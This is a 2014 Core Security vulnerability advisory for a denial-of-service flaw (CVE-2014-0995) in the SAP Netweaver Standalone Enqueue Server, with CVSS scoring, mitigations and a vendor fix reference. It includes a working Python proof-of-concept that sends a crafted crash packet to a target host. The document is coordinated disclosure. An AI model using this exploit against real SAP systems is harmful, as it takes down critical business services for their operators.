5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.041 Low
EPSS
Percentile
92.1%
**Title:**SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
**Advisory ID:**CORE-2014-0007
Advisory URL:https://www.coresecurity.com/core-labs/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
**Date published:**2014-10-15
**Date of last update:**2014-10-15
**Vendors contacted:**SAP
**Release mode:**Coordinated release
**Class:**Uncontrolled Recursion [CWE-674]
**Impact:**Denial of service
**Remotely Exploitable:**Yes
**Locally Exploitable:**No
CVE Name:CVE-2014-0995
SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. A vulnerability has been found in SAP Netweaver that could allow an unauthenticated, remote attacker to create denial of service conditions. The vulnerability is triggered by sending a specially crafted SAP Enqueue Server packet to remote TCP port 32NN (NN being the SAP system number) of a host running the βStandalone Enqueue Serverβ service, part of SAP Netweaver Application Server ABAP/Java. The βStandalone Enqueue Serverβ is a critical component of a SAP Netweaver installation in terms of availability, rendering the whole SAP system unresponsive.
Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: Restrict access to the Standalone Enqueue service by configuring Access Control Lists [4] and to the Standalone Enqueue Service TCP port 32XX (XX is the instance number).
SAP published a security note [3] with the fix.
This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by JoaquΓn RodrΓguez Varela from Core Advisories Team.
When the trace level of the service is configured to stop logging when a pattern is found [2], the service does not properly control the amount of recursion resulting in a stack overflow exception. The vulnerability can be triggered remotely by setting the trace level with a wildcard Trace Pattern. This vulnerability could allow a remote, unauthenticated attacker to conduct a denial of service attack against the vulnerable systems, rendering the Enqueue Server unavailable. The following python code can be used to trigger the vulnerability:
import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) # Connect print "[*] Connecting to", options.hostname, "port", options.port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) print "[*] Sending crash packet" crash = '\xab\xcd\xe1\x23' # Magic bytes crash+= '\x00\x00\x00\x00' # Id crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b' # Packet/frag length crash+= '\x03\x00\x00\x00' # Destination/Opcode/MoreFrags/Type crash+= 'ENC\x00' # Admin Eye-catcher crash+= '\x01\x00\x00\x00' # Version crash+= '#EAA' # Admin Eye-catcher crash+= '\x01\x00\x00\x00\x00' # Len crash+= '\x06\x00\x00\x00\x00\x00' # Opcode/Flags/RC crash+= '#EAE' # Admin Eye-catcher crash+= '\x01\x04\x00\x00' # Version/Action/Limit/Tread crash+= '\x00\x00\x00\x00' crash+= '\x00\x00\x00\x03\x00\x00\x00\x03' # Trace Level crash+= '\x01' # Logging crash+= '\x01\x40\x00\x00' # Max file size crash+= '\x00\x00\x00\x01\x00\x00\x00\x01' # No. patterns crash+= '\x00\x00\x00\x25#EAH' # Trace Eye-catcher crash+= '\x01*\x00' # Trace Pattern crash+= '#EAD' # Trace Eye-catcher send_packet(connection, crash) print "[*] Crash sent !"
[1] <http://www.sap.com/platform/netweaver/index.epx>.
[2] <http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm>
[3] SAP security note 2042845
[4] <https://websmp230.sap-ag.de/sap/support/notes/1495075>.
CoreLabs, the research center of Core Security, A Fortra Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright Β© 2014 Core Security and Β© 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security advisories team.